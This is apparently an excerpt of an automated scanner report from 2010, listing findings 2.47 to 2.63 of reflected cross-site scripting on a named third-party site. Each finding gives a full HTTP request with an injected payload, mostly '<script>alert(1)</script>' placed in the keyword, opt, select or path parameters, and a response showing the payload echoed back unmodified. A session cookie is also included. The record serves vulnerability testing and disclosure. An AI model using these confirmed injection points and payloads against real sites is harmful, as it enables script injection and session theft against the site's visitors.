Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload bd7d1<a>87b995cfb69 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/media-chat/search.php?keyword=search...bd7d1<a>87b995cfb69&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:31:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/search.php?keyword=search...bd7d1<a>87b995cfb69&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.47. http://www.resellerbase.com/adult/media-chat/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/search.php

Issue detail

The value of the keyword request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d1de"><a>1f19faa4207 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

POST /adult/media-chat/search.php?cat=17&keyword=search...4d1de"><a>1f19faa4207&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/search.php?cat=17&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:32:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 54748

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="/adult/media-chat/search.php?cat=17&keyword=search...4d1de"><a>1f19faa4207&Submit3=Search&opt=1/more2.html" style="color: ">
...[SNIP]...

2.48. http://www.resellerbase.com/adult/media-chat/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cc05"><script>alert(1)</script>fe070232f8744b8a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /adult/media-chat/search.php?cat=17&keyword=search...&Submit3=Search&/3cc05"><script>alert(1)</script>fe070232f8744b8a8opt=1&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/search.php?cat=17&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:37:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 54864

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="/adult/media-chat/search.php?cat=17&keyword=search...&Submit3=Search&/3cc05"><script>alert(1)</script>fe070232f8744b8a8opt=1&sort_by=title&sort_order=asc/more2.html" style="color: ">
...[SNIP]...

2.49. http://www.resellerbase.com/adult/media-chat/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f469"><a>0a51b81895 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/media-chat/search.php?cat=17&keyword=search...&Submit3=Search&opt=1&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%/4f469"><a>0a51b81895252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/search.php?cat=17&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:38:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 54902

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="/adult/media-chat/search.php?cat=17&keyword=search...&Submit3=Search&opt=1&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%/4f469"><a>0a51b81895252f/more2.html" style="color: ">
...[SNIP]...

2.50. http://www.resellerbase.com/adult/media-chat/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d0e14<script>alert(1)</script>1cfadc8a29a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/search.php?d0e14<script>alert(1)</script>1cfadc8a29a=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/search.php?d0e14<script>alert(1)</script>1cfadc8a29a=1 was not found on this server.</p>
...[SNIP]...

2.51. http://www.resellerbase.com/adult/media-chat/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/search.php

Issue detail

The value of the opt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 638de"><a>681ea33185c was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

POST /adult/media-chat/search.php?cat=17&keyword=search...&Submit3=Search&opt=1638de"><a>681ea33185c HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/search.php?cat=17&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:34:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 54748

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="/adult/media-chat/search.php?cat=17&keyword=search...&Submit3=Search&opt=1638de"><a>681ea33185c/more2.html" style="color: ">
...[SNIP]...

2.52. http://www.resellerbase.com/adult/media-chat/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload c7c96<a>e7bf0af9d5e was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/media-chat/search.php?keyword=search...&Submit3=Search&opt=2c7c96<a>e7bf0af9d5e HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/search.php?keyword=search...&Submit3=Search&opt=2c7c96<a>e7bf0af9d5e was not found on this server.</p>
...[SNIP]...

2.53. http://www.resellerbase.com/adult/media-chat/search.php [select parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/search.php

Issue detail

The value of the select request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26f56"><script>alert(1)</script>2512506b7c9 was submitted in the select parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/search.php?cat=17&keyword=search...&Submit3=Search&opt=1&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f26f56"><script>alert(1)</script>2512506b7c9&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/search.php?cat=17&keyword=search...&Submit3=Search&opt=1&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:35:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 55100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="/adult/media-chat/search.php?cat=17&keyword=search...&Submit3=Search&opt=1&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f26f56"><script>alert(1)</script>2512506b7c9&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f/more2.html" style="color: ">
...[SNIP]...

2.54. http://www.resellerbase.com/adult/media-chat/search.php [select parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/search.php

Issue detail

The value of the select request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16d9a"><a>9c7cf6b68b7 was submitted in the select parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/media-chat/search.php?cat=17&keyword=search...&Submit3=Search&opt=1&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f16d9a"><a>9c7cf6b68b7 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/search.php?cat=17&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:36:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 54902

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="/adult/media-chat/search.php?cat=17&keyword=search...&Submit3=Search&opt=1&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f16d9a"><a>9c7cf6b68b7/more2.html" style="color: ">
...[SNIP]...

2.55. http://www.resellerbase.com/adult/media-chat/themes/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 566c9<script>alert(1)</script>42fc5517d40 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult566c9<script>alert(1)</script>42fc5517d40/media-chat/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:31:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult566c9<script>alert(1)</script>42fc5517d40/media-chat/themes/ was not found on this server.</p>
...[SNIP]...

2.56. http://www.resellerbase.com/adult/media-chat/themes/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e8e33<script>alert(1)</script>57a288b3081 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chate8e33<script>alert(1)</script>57a288b3081/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:31:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chate8e33<script>alert(1)</script>57a288b3081/themes/ was not found on this server.</p>
...[SNIP]...

2.57. http://www.resellerbase.com/adult/media-chat/themes/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 357bd<script>alert(1)</script>6979d0e8d97 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes357bd<script>alert(1)</script>6979d0e8d97/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:31:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes357bd<script>alert(1)</script>6979d0e8d97/ was not found on this server.</p>
...[SNIP]...

2.58. http://www.resellerbase.com/adult/media-chat/themes/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e81aa<script>alert(1)</script>8e86b0b906c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/?e81aa<script>alert(1)</script>8e86b0b906c=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:30:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/?e81aa<script>alert(1)</script>8e86b0b906c=1 was not found on this server.</p>
...[SNIP]...

2.59. http://www.resellerbase.com/adult/media-chat/themes/kosmos/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6605a<script>alert(1)</script>50884c6566d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult6605a<script>alert(1)</script>50884c6566d/media-chat/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:31:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult6605a<script>alert(1)</script>50884c6566d/media-chat/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.60. http://www.resellerbase.com/adult/media-chat/themes/kosmos/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 73251<script>alert(1)</script>9a72b0e215b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat73251<script>alert(1)</script>9a72b0e215b/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:31:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat73251<script>alert(1)</script>9a72b0e215b/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.61. http://www.resellerbase.com/adult/media-chat/themes/kosmos/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload dec27<script>alert(1)</script>2cd3898fb0a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themesdec27<script>alert(1)</script>2cd3898fb0a/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themesdec27<script>alert(1)</script>2cd3898fb0a/kosmos/ was not found on this server.</p>
...[SNIP]...

2.62. http://www.resellerbase.com/adult/media-chat/themes/kosmos/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ffbda<script>alert(1)</script>2d74f53a065 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmosffbda<script>alert(1)</script>2d74f53a065/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmosffbda<script>alert(1)</script>2d74f53a065/ was not found on this server.</p>
...[SNIP]...

2.63. http://www.resellerbase.com/adult/media-chat/themes/kosmos/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e66b4<script>alert(1)</script>e98e9db04eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/?e66b4<script>alert(1)</script>e98e9db04eb=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:31:06 GMT
Server: Apache/2
